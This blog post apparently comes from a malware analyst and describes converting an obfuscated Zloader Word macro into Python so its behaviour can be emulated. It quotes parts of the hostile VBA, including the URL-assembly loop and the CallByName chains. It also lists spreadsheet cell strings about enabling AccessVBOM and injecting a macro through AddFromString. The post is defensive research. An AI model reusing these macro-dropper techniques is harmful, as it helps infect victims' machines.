In my previous blog post, we looked at a fairly simple malicious VBA macro that used string obfuscation, and we converted the code to Python to understand its real intentions. It wasn’t particularly complicated.
Today it will be a lot more complicated. We will investigate a sample I’ve spent some time on previously, but with a different focus. Back then, we needed to understand how it worked. Now my focus is: what is needed to run this sample in a Python environment to see what it’s doing? The sample is not difficult to extract content from (MSHTML/OLE2), but...
In short, this sample runs a Word macro on document_close that attempts to download a password-encrypted XLS spreadsheet (without macros, but with information in its cells), loads it silently, accesses its properties, injects a new macro into Excel and runs it, which then drops a Zloader DLL into svchost on the target machine. Robert Neumann and I did a nice write-up about the mechanics in a blog post here last week.
Replicating this in Python is going to be messy, but let’s start. First of all, what do we need?
- We need the decompressed macro source code for the Word document
  - Lots of tools out there can do this, but you first need to decompress the ActiveMime.
- We need the UserFormX information to populate variables in the code
  - I wrote my own tool, but does something already exist?
- We need to get the VBA macro code, starting with document_close, to run in a Python world and download the XLS, where we’ll need to:
  - Decrypt the XLS with the password
  - Extract the XF formulas and cell information to map what is where
  - Build an object-oriented world that looks like VBA in Python
    - Access to an “excel.application” object
    - Access to sheets and cells (and control structures/API)
  - Log what activity the sample performs
- Build a tool that creates all this automatically and generates the threat intelligence you are after
Not a small order for a small blog post, so let’s start. I envision two modules:
- A tool that reads an Office document (Word, Excel) and generates JSON data for:
  - Excel, Word
  - VBA source code
    - Just decompressed text
  - UserFormX information
    - Each UserForm has its own table of JSON objects
  - Sheet/cell/XF information (if Excel)
    - Each sheet and cell will have its own JSON object describing its area
- A second tool that loads the output from part 1, converts the code to Python using the rules from the JSON, and starts executing at the global macro level. If downloads are required, it will spawn the first tool to generate new raw data for the new target, which is then read into the Python universe
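The first tool’s output could be organized roughly like this. This is a minimal sketch, and the key names (`document`, `vba_source`, `userforms`, `sheets`) are my own hypothetical choices rather than a fixed format; the sample records come from this sample’s UserForm and cell exports, with cell rows and columns kept 0-based as exported. XF and formula details could hang off each cell entry in the same way.

```python
import json

def build_document_json(doc_type, vba_source, userform_records, cell_records):
    """Assemble one document's extracted data as JSON (hypothetical layout).

    userform_records: (form, index, identifier, value) tuples
    cell_records: (sheet_index, sheet_name, col, row, value) tuples, 0-based
    """
    doc = {
        "document": {"type": doc_type},
        "vba_source": vba_source,  # the decompressed macro text
        "userforms": {},
        "sheets": {},
    }
    # Each UserForm gets its own table of control objects
    for form, index, ident, value in userform_records:
        doc["userforms"].setdefault(form, []).append(
            {"index": index, "name": ident, "value": value})
    # Each sheet gets its own object, holding one object per cell
    for sheet_index, sheet_name, col, row, value in cell_records:
        sheet = doc["sheets"].setdefault(
            sheet_name, {"index": sheet_index, "cells": []})
        sheet["cells"].append({"row": row, "col": col, "value": value})
    return json.dumps(doc, indent=2)

word_json = build_document_json(
    "Word", "Sub c6()\n...\nEnd Sub",
    [("UserForm2", 2, "ComboBox2", "ht"), ("UserForm1", 18, "syh", "pp")], [])
xls_json = build_document_json("Excel", "", [], [(3, "Sheet1", 40, 17, "Quit")])
print(xls_json)
```

Keeping one JSON document per downloaded file means the second tool can load a new target’s data the same way it loaded the original Word document’s.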
Where do we start attacking the Python world?
Take the c6() subroutine in VBA, which looks like this:
```vba
Sub c6()
    UserForm2.ComboBox1.AddItem UserForm1.fb & UserForm1.af
    UserForm2.ComboBox1.ListIndex = 7
    p8 = UserForm2.ComboBox24
    Set m4 = CreateObject(UserForm2.ComboBox1)
    UserForm2.ComboBox1.ListIndex = 6
    m4.DisplayAlerts = False
    hm = UserForm2.ComboBox3
End Sub
```
Building an object model in which an Application holds Sheets, which in turn hold Cells, lets you modify the code as little as possible. However, the constructor of UserForm1 must run exactly when it is first needed; in this case, that is on the first line of c6. That means the Python version of this section will look a lot like this:
```python
def c6(self):
    global UserForm1
    # Construct UserForm1 on first use, where VBA would initialize it
    UserForm1 = _UserForm1()
    # VBA's & (string concatenation) becomes + in Python
    UserForm2.ComboBox1.AddItem(UserForm1.fb + UserForm1.af)
    UserForm2.ComboBox1.ListIndex = 7
    self.p8 = UserForm2.ComboBox24
    self.m4 = CreateObject(UserForm2.ComboBox1)
    UserForm2.ComboBox1.ListIndex = 6
    self.m4.DisplayAlerts = False
    self.hm = UserForm2.ComboBox3
```
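A bare-bones version of the Application, Sheets and Cells model might look like the following. This is a sketch under my own assumptions, not the VBA2Python code: the class names are hypothetical, `Cells(row, col)` is 1-based as in Excel, and `Sheets.Add(name)` is a simplification that does not match Excel’s real `Sheets.Add` signature.

```python
class Cell:
    def __init__(self, value=""):
        # VBA returns Empty for a blank cell; "" stands in for it here
        self.Value = value

class Sheet:
    def __init__(self, name):
        self.Name = name
        self._cells = {}

    def Cells(self, row, col):
        # 1-based (row, col) like Excel; blank cells are created on demand
        return self._cells.setdefault((row, col), Cell())

class Sheets:
    def __init__(self):
        self._sheets = []

    def Add(self, name):
        # Hypothetical simplification of Excel's Sheets.Add
        sheet = Sheet(name)
        self._sheets.append(sheet)
        return sheet

    def __call__(self, key):
        # Sheets(1) or Sheets("Sheet1"), as in VBA
        if isinstance(key, int):
            return self._sheets[key - 1]
        return next(s for s in self._sheets if s.Name == key)

    @property
    def Count(self):
        return len(self._sheets)

class Application:
    def __init__(self):
        self.DisplayAlerts = True
        self.Sheets = Sheets()

app = Application()
sh1 = app.Sheets.Add("Sheet1")
sh1.Cells(18, 41).Value = "Quit"
print(app.Sheets("Sheet1").Cells(18, 41).Value)  # Quit
```

Because VBA uses parentheses for both calls and indexing, making `Sheets` callable and `Cells` a method lets generated lines like `Sh1.Cells(lu, 1).Value` stay almost unchanged.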
When you generate the Python, you need to follow the flow and find where each object is first accessed, so that its constructor is called at the right time. Some of the variables (p3, m4, etc.) come from the various UserForms; many are initialized to “” but others to real values you need (like the URL and some very important strings). Here is an example of the UserForm data you need to extract and feed to the __init__ of the UserForm class itself:
```text
UserForm2,13,ComboBox13,wF
UserForm2,12,ComboBox12,ni
UserForm2,11,ComboBox11,oz
UserForm2,10,ComboBox10,ta
UserForm2,9,ComboBox9,CR
UserForm2,8,ComboBox8,//
UserForm2,7,ComboBox7,VA
UserForm2,6,ComboBox6,s:
UserForm2,5,ComboBox5,KJ
UserForm2,4,ComboBox4,tp
UserForm2,3,ComboBox3,mAL
UserForm2,2,ComboBox2,ht
UserForm2,1,ComboBox1,EMPTY
UserForm3,1,ComboBox1,EMPTY
UserForm1,18,syh,pp
UserForm1,17,kk,En
UserForm1,16,ir,EMPTY
UserForm1,15,wgf,EMPTY
UserForm1,14,ib,visi
```
As you can see, each record is just the UserForm it belongs to (1..5), the index the control will have, the identifier the code uses to reach it, and its initial value.
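Turning these records into UserForm attributes is mostly bookkeeping. A minimal sketch, assuming the records arrive as the comma-separated lines shown above, that `EMPTY` means an empty string, and that plain strings are good enough for now (a fuller model would wrap each value in a control object). `load_userforms` and `UserFormBase` are hypothetical names, and only a few of the records are included:

```python
import csv
import io
from collections import defaultdict

RECORDS = """UserForm2,2,ComboBox2,ht
UserForm2,1,ComboBox1,EMPTY
UserForm1,18,syh,pp
UserForm1,17,kk,En"""

def load_userforms(text):
    """Group (form, index, identifier, value) records per UserForm."""
    forms = defaultdict(dict)
    for form, index, ident, value in csv.reader(io.StringIO(text)):
        # EMPTY marks a control with no initial value
        forms[form][int(index)] = (ident, "" if value == "EMPTY" else value)
    return forms

class UserFormBase:
    """Hypothetical base class: exposes each control as an attribute."""
    def __init__(self, controls):
        # Create attributes in control-index order
        for index in sorted(controls):
            ident, value = controls[index]
            setattr(self, ident, value)

forms = load_userforms(RECORDS)
UserForm1 = UserFormBase(forms["UserForm1"])
print(UserForm1.syh, UserForm1.kk)  # pp En
```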
When execution reaches the constructor and it generates the URL for the download, it runs VBA code like this:
```vba
Set f5 = UserForm2.Controls
n6 = f5.Count - 1
qj = ""
For ej = 1 To n6
    qj = qj & f5.Item(ej)
    ej = ej + 1
Next
ComboBox1.AddItem "f9"
ComboBox1.AddItem "pw"
ComboBox1.AddItem "ujk"
ComboBox1.AddItem "rt"
ComboBox1.AddItem "l2"
ComboBox1.AddItem "ku"
ComboBox1.AddItem qj
```
Converted to our Python world, it looks like this:
```python
f5 = self.Controls
n6 = f5.Count - 1
qj = ""
# The VBA body also does ej = ej + 1, so the effective step is 2;
# VBA's "To n6" is inclusive, hence n6 + 1 as the range stop
for ej in range(1, n6 + 1, 2):
    qj = qj + f5.Item(ej)
    # ej = ej + 1  (handled by the range step)
self.ComboBox1.AddItem("f9")
self.ComboBox1.AddItem("pw")
self.ComboBox1.AddItem("ujk")
self.ComboBox1.AddItem("rt")
self.ComboBox1.AddItem("l2")
self.ComboBox1.AddItem("ku")
self.ComboBox1.AddItem(qj)
```
Basically, the object model you create must give the UserForm2 object a Controls class whose Items you can iterate through. The last key part is the sequence of AddItem calls: the UserForm2.ComboBox1 class holds an array of entries, and here it “pushes” 6 values before the URL (qj) is added. Later, c6 sets UserForm2.ComboBox1.ListIndex to 6 to access the URL; ListIndex is zero-based, so that selects the seventh entry.
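The Controls collection and the ComboBox list can be emulated with two small classes. This sketch rests on my own assumptions: `Controls.Item(i)` is zero-based and returns the combo boxes in ComboBox index order, and only the thirteen UserForm2 records listed earlier are loaded, so the loop assembles just the start of the URL. Implementing `__radd__` lets the generated `qj + f5.Item(ej)` work unchanged while `Item` still returns the control, roughly mimicking VBA’s default property. Since `ListIndex` is zero-based, the seventh entry (the URL) sits at index 6.

```python
class ComboBox:
    """Minimal MSForms-like ComboBox: a list plus a zero-based ListIndex."""
    def __init__(self, value=""):
        self._items = []
        self.ListIndex = -1   # -1 means nothing selected
        self._value = value   # initial value from the UserForm data

    def AddItem(self, item):
        self._items.append(item)

    @property
    def Value(self):
        # Selecting an entry via ListIndex makes it the control's value
        if 0 <= self.ListIndex < len(self._items):
            return self._items[self.ListIndex]
        return self._value

    def __str__(self):
        return self.Value

    # Default-property behavior when concatenating with strings
    def __add__(self, other):
        return self.Value + str(other)

    def __radd__(self, other):
        return str(other) + self.Value

class Controls:
    def __init__(self, controls):
        self._controls = controls

    @property
    def Count(self):
        return len(self._controls)

    def Item(self, index):
        # Zero-based, like UserForm.Controls.Item(index)
        return self._controls[index]

# UserForm2 ComboBox1..ComboBox13 initial values, in index order
values = ["", "ht", "mAL", "tp", "KJ", "s:", "VA", "//", "CR", "ta", "oz", "ni", "wF"]
boxes = [ComboBox(v) for v in values]
f5 = Controls(boxes)

n6 = f5.Count - 1
qj = ""
for ej in range(1, n6 + 1, 2):  # the VBA loop with its extra ej = ej + 1
    qj = qj + f5.Item(ej)

combo1 = boxes[0]
for item in ["f9", "pw", "ujk", "rt", "l2", "ku", qj]:
    combo1.AddItem(item)
combo1.ListIndex = 6
print(qj, combo1.Value)  # https://tani https://tani
```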
Another aspect is the use of “On Error Resume Next”, which this sample abuses quite a bit. It simply means: if you encounter an error, continue with the next instruction. However, you need to consider how VBA handles instructions. The easier parts are instructions like these:
```python
xm = j6
qu = o0
self.mk = q1
fx = z8i
```
None of j6, o0, q1 or z8i is defined, so each assignment causes an error, but that is easy to capture with a try/except around each logical unit (remember, this code will be generated by a tool, not written by a human):
```python
try:
    gc = hv
except Exception:
    pass
```
You can’t just wrap everything in a single try/except, because you need to resume at the next logical instruction.
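A generator can emit that per-statement wrapping mechanically. The helper below is hypothetical and only handles straight-line statements; loops and If blocks need their conditions and bodies wrapped separately, which is where it gets harder.

```python
def emit_resume_next(statements, indent="    "):
    """Wrap each generated statement in its own try/except.

    This approximates VBA's On Error Resume Next for straight-line code:
    a failing statement is skipped and execution continues with the next one.
    """
    lines = []
    for stmt in statements:
        lines += ["try:", indent + stmt, "except Exception:", indent + "pass"]
    return "\n".join(lines)

source = emit_resume_next(["xm = j6", "a = 1", "qu = o0", "b = a + 1"])
namespace = {}
exec(source, namespace)
print(namespace["a"], namespace["b"], "xm" in namespace)  # 1 2 False
```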
The harder part of the exception trick is when the download is complete and the code should break out of the loop that sets a timer to rerun the macro at intervals. It jumps to ErrHandler, which breaks out of the If statement.
So you need to understand the code well to port it to Python.
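For the ErrHandler case, a VBA `On Error GoTo ErrHandler` maps more naturally onto one try/except around the whole block, with the code after the `ErrHandler:` label moved into the except clause. The loop and the simulated error below are hypothetical, not taken from the sample, and the sketch ignores VBA’s `Resume` statements, which would need extra handling:

```python
class VBARuntimeError(Exception):
    """Hypothetical stand-in for a VBA runtime error."""

def poll(attempts, fail_at=None):
    # Rough equivalent of:
    #   On Error GoTo ErrHandler
    #   <loop>
    #   Exit Sub
    #   ErrHandler:
    #   <handler>
    log = []
    try:
        for n in range(attempts):
            log.append(f"attempt {n}")
            if n == fail_at:
                raise VBARuntimeError("error raised inside the loop")
        log.append("loop finished")
        return log  # Exit Sub
    except VBARuntimeError:
        # The handler runs once and control never returns into the loop
        log.append("ErrHandler")
        return log

print(poll(5, fail_at=2))  # ['attempt 0', 'attempt 1', 'attempt 2', 'ErrHandler']
print(poll(2))             # ['attempt 0', 'attempt 1', 'loop finished']
```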
You will see that the “Python VBA” code creates an excel.application object and tries to OpEn the workbook at the given URL with the given password.
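To watch what the sample does without a real Excel, `CreateObject` can hand back stand-in objects that log every property write and method call. A minimal sketch: `ACTIVITY`, `Recorder` and this `CreateObject` are hypothetical, the stand-ins only log (they do not store values), and the URL and password below are placeholders rather than the sample’s real values.

```python
ACTIVITY = []  # every emulated call ends up here

class Recorder:
    """Stand-in object that logs attribute writes and method calls."""
    def __init__(self, path):
        object.__setattr__(self, "_path", path)

    def __getattr__(self, name):
        # Unknown members become nested recorders, e.g. app.Workbooks.Open
        return Recorder(f"{self._path}.{name}")

    def __setattr__(self, name, value):
        ACTIVITY.append(f"set {self._path}.{name} = {value!r}")

    def __call__(self, *args, **kwargs):
        parts = [repr(a) for a in args] + [f"{k}:={v!r}" for k, v in kwargs.items()]
        ACTIVITY.append(f"call {self._path}({', '.join(parts)})")
        return Recorder(f"{self._path}()")

def CreateObject(prog_id):
    # COM ProgIDs are case-insensitive, so normalise the recorder path
    ACTIVITY.append(f"CreateObject({prog_id!r})")
    return Recorder(prog_id.lower())

m4 = CreateObject("Excel.Application")
m4.DisplayAlerts = False
m4.Workbooks.Open("https://example.invalid/file.xls", Password="placeholder")
for entry in ACTIVITY:
    print(entry)
```

The resulting log is the raw material for the threat-intelligence output: which objects were created, which settings were changed, and which URLs were opened.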
So now the Python code needs to fetch the file and run it through the first tool to generate the JSON data for the sheets/cells/XF (for now I cheat and use CSV). Looking at the cell data, I currently export it simply as CSV like this:
```text
..
3,Sheet1,40,17,"Quit"
3,Sheet1,26,0,"VBComponents"
2,Sheet2,46,128,"REG_DWORD"
2,Sheet2,40,94,"\Excel\Security\AccessVBOM"
2,Sheet2,13,83,"1.000000"
3,Sheet1,31,30,"ThisWorkbook.gykvtla"
3,Sheet1,12,30,"Add"
3,Sheet1,9,4,"AddFromString"
2,Sheet2,12,43,"CountOfLines"
2,Sheet2,49,40,"CodeModule"
..
```
If we look at the first line, it means sheet 3, named “Sheet1”, row 18 (17+1), zero-based column 40 (column AO), with the value “Quit”. You absolutely need this information to make the code run correctly. To make matters harder, you also need to follow Excel formula statements, where, for instance, a cell is set equal to the content of another cell.
Basically, the module that generates the cell info will need to deal with this.
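Loading the cell export and following cell-to-cell references could look roughly like this. It is a sketch under my own assumptions: each record is `sheet index, sheet name, column, row, value` with 0-based column and row (as in the “Quit” example), and a formula is only a plain same-sheet reference such as `=AO18`. The `=AO18` cell is invented for illustration, and real XF and formula records would need a proper parser.

```python
import csv
import io
import re

def col_letters(col):
    """0-based column index to Excel letters: 0 -> A, 25 -> Z, 40 -> AO."""
    letters = ""
    col += 1
    while col:
        col, rem = divmod(col - 1, 26)
        letters = chr(ord("A") + rem) + letters
    return letters

def load_cells(text):
    """Map (sheet name, A1 address) -> raw value from the CSV export."""
    cells = {}
    for _, sheet, col, row, value in csv.reader(io.StringIO(text)):
        cells[(sheet, f"{col_letters(int(col))}{int(row) + 1}")] = value
    return cells

REF = re.compile(r"^=([A-Z]+[0-9]+)$")  # hypothetical: only "=A1"-style refs

def resolve(cells, sheet, address, seen=None):
    """Follow plain same-sheet references until a literal value is reached."""
    if seen is None:
        seen = set()
    if (sheet, address) in seen:
        raise ValueError(f"circular reference at {sheet}!{address}")
    seen.add((sheet, address))
    value = cells.get((sheet, address), "")
    match = REF.match(value)
    return resolve(cells, sheet, match.group(1), seen) if match else value

DATA = '''3,Sheet1,40,17,"Quit"
3,Sheet1,26,0,"VBComponents"
3,Sheet1,0,0,"=AO18"'''  # the last record is a hypothetical formula cell
cells = load_cells(DATA)
print(resolve(cells, "Sheet1", "A1"))  # Quit
```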
Building the macro in Excel from Word
Later in the Word macro code, once it has built an object to access Excel (self.m4), it runs the following VBA code:
```vba
While fp
    jq = Sh1.Cells(lu, 1).Value
    If Len(jq) < 1 Then
        fp = False
    Else
        hp = hp & jq
    End If
    lu = lu + 1
Wend
vme = CallByName(m4, vu, 2)
UserForm1.pb.Value = bp & vme & fd
UserForm1.gk.Value = lg
CallByName CreateObject(ab), it, 1, UserForm1.pb, nk, UserForm1.gk
Set sdx = CreateObject(pc)
Set a8 = CallByName(sdx, r9, 2)
Set i8 = CallByName(a8, rq, 1)
Set gc = CallByName(sdx, gc, 2)
```
In my Python world this corresponds to this code:
```python
while fp:
    jq = Sh1.Cells(lu, 1).Value
    if len(jq) < 1:
        fp = False
    else:
        self.hp = self.hp + jq
    lu = lu + 1
vme = CallByName(self.m4, vu, 2)
UserForm1.pb.Value = bp + vme + fd
UserForm1.gk.Value = lg
CallByName(CreateObject(ab), it, 1, UserForm1.pb, nk, UserForm1.gk)
sdx = CreateObject(pc)
a8 = CallByName(sdx, r9, 2)
i8 = CallByName(a8, rq, 1)
self.gc = CallByName(sdx, self.gc, 2)
```
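`CallByName` maps fairly directly onto Python’s `getattr` and `setattr`. The call types used here (1 and 2) are VBA’s `vbMethod` and `vbGet`; `vbLet` is 4 and `vbSet` is 8. A minimal sketch, assuming the emulated objects expose their VBA members as Python attributes. Because VBA resolves member names case-insensitively, names are matched ignoring case. The `Workbooks` and `Application` classes in the usage lines are hypothetical:

```python
VB_METHOD, VB_GET, VB_LET, VB_SET = 1, 2, 4, 8  # VbCallType values

def _resolve_name(obj, name):
    """Find the attribute whose name matches case-insensitively."""
    for attr in dir(obj):
        if attr.lower() == name.lower():
            return attr
    return name  # fall back to the name as given

def CallByName(obj, proc_name, call_type, *args):
    """Emulate VBA's CallByName on a Python object."""
    name = _resolve_name(obj, proc_name)
    if call_type == VB_METHOD:
        return getattr(obj, name)(*args)
    if call_type == VB_GET:
        value = getattr(obj, name)
        # A Property Get with arguments (an indexed property) is callable
        return value(*args) if args else value
    if call_type in (VB_LET, VB_SET):
        setattr(obj, name, args[0])
        return None
    raise ValueError(f"unsupported call type: {call_type}")

class Workbooks:
    """Hypothetical emulated Workbooks collection."""
    def __init__(self):
        self.opened = []

    def Open(self, filename, password=""):
        self.opened.append((filename, password))
        return f"workbook:{filename}"

class Application:
    """Hypothetical emulated excel.application object."""
    def __init__(self):
        self.DisplayAlerts = True
        self.Workbooks = Workbooks()

app = Application()
CallByName(app, "displayalerts", VB_LET, False)
books = CallByName(app, "Workbooks", VB_GET)
wb = CallByName(books, "OpEn", VB_METHOD, "book.xls", "secret")
print(app.DisplayAlerts, wb)  # False workbook:book.xls
```

The objects `CallByName` returns are only as useful as the emulated classes behind them, which is why those classes need to carry real values to follow the flow.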
I try to change the VBA code as little as possible. From the UserForm input data, you know what is a “global” and which variables belong to which module.
In the end, you get output showing what this would do to execute the macro in Excel.
I’m not saying this is particularly easy to do, but it’s a start. There is still some work left: the objects returned by CallByName need to be created and given values to really follow the flow. Next time I hope to “run” the remote macro in “Excel” as well, to see if we can drop that DLL too… I think it’s quite a bit of progress for a day or two of work.
Stay tuned for more VBA2Python, the tool I’m trying to create to solve this problem. It’s definitely a challenge, but you learn new things and improve every day.